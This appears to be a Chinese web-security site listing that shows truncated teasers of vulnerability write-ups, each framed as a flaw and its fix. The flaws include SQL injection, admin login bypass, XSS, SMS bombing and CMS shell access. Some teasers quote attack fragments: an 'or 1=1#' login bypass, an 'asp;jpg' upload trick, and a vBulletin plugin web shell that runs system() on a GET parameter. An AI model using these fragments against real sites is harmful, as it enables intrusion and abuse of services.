php video script SQL注射缺陷及修复 - 网站安全 - 自学关注热度:16

标题: php video script SQL Injection Vulnerability作者: longrifle0x www.2cto.com www.security-research.ge下载地址:http://www.alurian.com/php-video-script/测试工具: SQLMAP概述在video_tags.....[详情]

冰山信息发布系统后台登陆漏洞及修复 - 网站安关注热度:11

默认后台为 admin可直接利用 a or 1=1# php万能密码进后台后台有上传 直接上传 1.asp;jpg点击查看原文件可知路径摘自 少龙blogwww.2cto.com修复方案：过滤..[详情]

126cms后台登陆注入漏洞及修复 - 网站安全 - 自学关注热度:9

看代码。。01 若干02 if( !$postdb[userid] || !$postdb[pwd] )03 {04 echo div align=\center\ class=\style1\;05 echo 您输入的用户名或密码有误！!!;06 echo /div;.....[详情]

vBulletin论坛后台拿shell及修复 - 网站安全 - 自学关注热度:11

在后台，进插件管理.添加插件. Ajax_complete 填入代码:if(isset($_GET[#39;cmd#39;])){echo h1cmd/h1pre; system($_GET[#39;cmd#39;]);exit;}激活mod 访问：www.2cto.com /forumlocation/aja.....[详情]

点点网反射型XSS Ⅱ及formKey泄露 - 网站安全 - 自学关注热度:13

模版静态资源上传页面（http://www.diandian.com/upload/asset）和Flash跨域通信的配置文件中（http://www.diandain.com/crossdomain.xml）允许的域名相同，只需上传一个SWF，就可以读到formKey了。把这SWF嵌..[详情]

点点网存储型Xss详细分析及解决 - 网站安全 - 自关注热度:12

点点网某处编程缺陷导致存储型Xss。响应xsser的精神，分享就要写过程。--------------------------------1. 点点网，在xxx.diandian.com域下是允许自定义JS内容的，但是没有formkey的话，无非进行写操..[详情]

Hotel Booking Portal v0.1多重缺陷及修复 - 网站安全关注热度:18

Hotel Booking Portal v0.1 Multiple Vulnerabilities作者 Yakir Wizman, yakir.wizman@gmail.com下载地址 http://sourceforge.net/projects/hbportal/I. 描述# ---------------------------------.....[详情]

web安全自动化运维 - 网站安全 - 自学php关注热度:12

你有可能也会遇到这种情况，公司没有任何安全设备，也没有资金采购，应付层层攻击，那么作为公司唯有一个安全工程师，如何来自动化保障公司的web安全呢？ 下面，结合我的一些经..[详情]

科讯kesioncms 5.5以下漏洞拿shell方法原理总结 - 网关注热度:24

科讯做为一个强大的cms程序大多被政府和教育机构网站所使用，关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码，而认证码没有保存在数据库而是保存在a..[详情]

欧朋浏览器官网短信缺少验证致短信炸弹 - 网站关注热度:32

http://www.oupeng.com/download 可以被利用 进行手机轰炸http://www.oupeng.com/wp-content/plugins/sms/sendsms.php?mobile= +手机号但是要提交cookies 、、、简单一抓cookies=__utmc=247447450; _gscbrs.....[详情]

点点某功能两处存储型XSS与一个反射型xss - 网站关注热度:22

看到点点博客，一下子就喜欢上了它的简洁清新的风格，当然，自己喜欢的东西潜意识里总希望它能好上加好，所以就花了一些时间给点点做了下简单的xss测试，希望通过我的一点点努..[详情]

二级域名的查找与扫描 - 网站安全 - 自学php关注热度:83

关于域名的概念我不在这里做过多介绍。关于查找和扫描二级域名的作用，我想对于每一个搞渗透的同志来说是至关重要的。就一点：当主站无从下手的时候，你可以从C段，同IP站点下..[详情]

WordPress插件Mz-jajak <= 2.1 SQL注射及修复 - 网站安关注热度:19

标题: WordPress Mz-jajak plugin = 2.1 SQL Injection Vulnerability作者: StRoNiX www.2cto.com hacker@hotmail.rs下载地址: http://downloads.wordpress.org/plugin/mz-jajak.zip影响版本: 2.1.....[详情]

ProQuiz v2.0.2多重缺陷及修复 - 网站安全 - 自学ph关注热度:52

标题: ProQuiz v2.0.2 - Multiple Vulnerabilities作者: L0n3ly-H34rT http://www.2cto.com/ l0n3ly_h34rt@hotmail.com程序官网: http://proquiz.softon.org/下载地址: http://code.google.com/p/proq.....[详情]

WordPress SimpleMail Plugin Email字段脚本插入漏洞及修关注热度:13

WordPress是一种使用PHP语言和MySQL数据库开发的Blog（博客、网志)引擎，用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。SimpleMail plugin for WordPress 1.0.6及其他版本在实现上存在多个..[详情]